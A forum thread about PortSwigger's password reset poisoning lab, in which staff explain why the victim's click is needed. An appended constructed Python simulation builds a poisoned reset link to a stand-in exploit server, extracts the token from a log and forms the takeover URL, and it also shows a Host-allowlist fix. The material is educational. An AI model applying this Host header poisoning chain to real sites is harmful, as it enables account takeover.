Burp Suite User Forum


Basic password reset poisoning query

Nowicjusz | Last updated: Aug 26, 2021 01:14PM UTC

I am wondering if the lab description is misleading: "The user carlos will carelessly click on any links in emails that he receives." Do we, theoretically, need any interaction from the affected user? Because the forged request generates the token for the password reset, and the server response containing it is sent to the attacker-controlled 'exploit server' and logged. It seems to me that we don't need Carlos here. Next, we simply edit the URL with the generated token and use it to reset Carlos's password. There was no follow-up email to confirm whether this was an intended action to reset the password as well. Cheers

Michelle, PortSwigger Agent | Last updated: Aug 27, 2021 12:59PM UTC

Thanks for your message. Carlos does play a part in this lab. When you set the username to Carlos, it sends the reset email to his registered email address. Normally, when you click the reset link, it sends a GET /forgot-password?temp-forgot-password-token=<reset-token> request to the actual website, which looks at the token and uses it to determine whose password is being reset. Because we've overridden the host in the URL, this request instead goes to our exploit server, so we can see the token in the access log. The bit where we need Carlos, though, is that this request would never get sent unless he clicked on the link. I hope this helps to answer your query. Good luck with the labs!
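
The chain the reply describes, as an added example that is not PortSwigger's lab code or anything posted in this thread: the reset link is built from the request's Host header, so the attacker's forged request makes the emailed link point at the exploit server; nothing reaches the attacker until Carlos clicks, at which point the token appears in the exploit server's access log and can be pasted into a link on the real site. The hardened builder, which ignores Host and uses a configured canonical origin plus a Host allowlist, is a standard mitigation and not something the thread states. The hostnames, the client IP and the access-log format are constructed for illustration; only the path and parameter name come from the reply above.

```python
"""Password reset poisoning via the Host header, end to end (constructed example)."""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

CANONICAL_ORIGIN = "https://vulnerable-site.example"   # assumed: the real lab site
EXPLOIT_SERVER = "exploit-server.example"               # assumed: attacker-controlled host
RESET_PATH = "/forgot-password"                         # path quoted in the reply
TOKEN_PARAM = "temp-forgot-password-token"              # parameter quoted in the reply
ALLOWED_HOSTS = frozenset({urlsplit(CANONICAL_ORIGIN).hostname})


def build_reset_link_vulnerable(host_header: str, token: str) -> str:
    """Vulnerable: the link in the email is built from the incoming Host header,
    so whatever host the attacker supplies is where Carlos's click will go."""
    return f"https://{host_header}{RESET_PATH}?{TOKEN_PARAM}={token}"


def build_reset_link_fixed(host_header: str, token: str) -> str:
    """Hardened: reject unexpected Host values and never derive the link from
    the request; the origin comes from configuration instead."""
    if host_header not in ALLOWED_HOSTS:
        raise ValueError(f"unexpected Host header: {host_header!r}")
    return f"{CANONICAL_ORIGIN}{RESET_PATH}?{TOKEN_PARAM}={token}"


def simulate_carlos_click(link: str) -> Tuple[str, str]:
    """The one step that needs Carlos: his browser sends a GET to whichever host
    the link names. Returns (host contacted, constructed access-log line)."""
    parts = urlsplit(link)
    target = parts.path + (f"?{parts.query}" if parts.query else "")
    # Constructed log line in a common access-log shape (client IP is a doc-range address).
    log_line = f'203.0.113.7 - - "GET {target} HTTP/1.1" 200 0'
    return parts.hostname, log_line


def token_from_access_log(log_lines: List[str]) -> Optional[str]:
    """What the attacker does afterwards: pull the token out of the logged request."""
    request_line = re.compile(r'"GET (\S+) HTTP/1\.[01]"')
    for line in log_lines:
        m = request_line.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query)
        if TOKEN_PARAM in query:
            return query[TOKEN_PARAM][0]
    return None


def attacker_reset_url(token: str) -> str:
    """Edit the captured token into a link on the real site and reset the password."""
    return f"{CANONICAL_ORIGIN}{RESET_PATH}?{TOKEN_PARAM}={token}"


if __name__ == "__main__":
    issued_token = "a1b2c3"  # constructed stand-in for the server-generated token
    # Attacker forges the reset request with Host: exploit-server.example.
    emailed_link = build_reset_link_vulnerable(EXPLOIT_SERVER, issued_token)
    host, log_line = simulate_carlos_click(emailed_link)
    print("Carlos's click went to:", host)
    captured = token_from_access_log([log_line])
    print("Attacker uses:", attacker_reset_url(captured))
    # With the fix, the same forged Host is rejected outright.
    try:
        build_reset_link_fixed(EXPLOIT_SERVER, issued_token)
    except ValueError as exc:
        print("Fixed builder:", exc)
```

Note that `token_from_access_log` only ever sees a token because `simulate_carlos_click` ran; drop that call and the attacker's log stays empty, which is the point the reply makes about why Carlos is needed.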
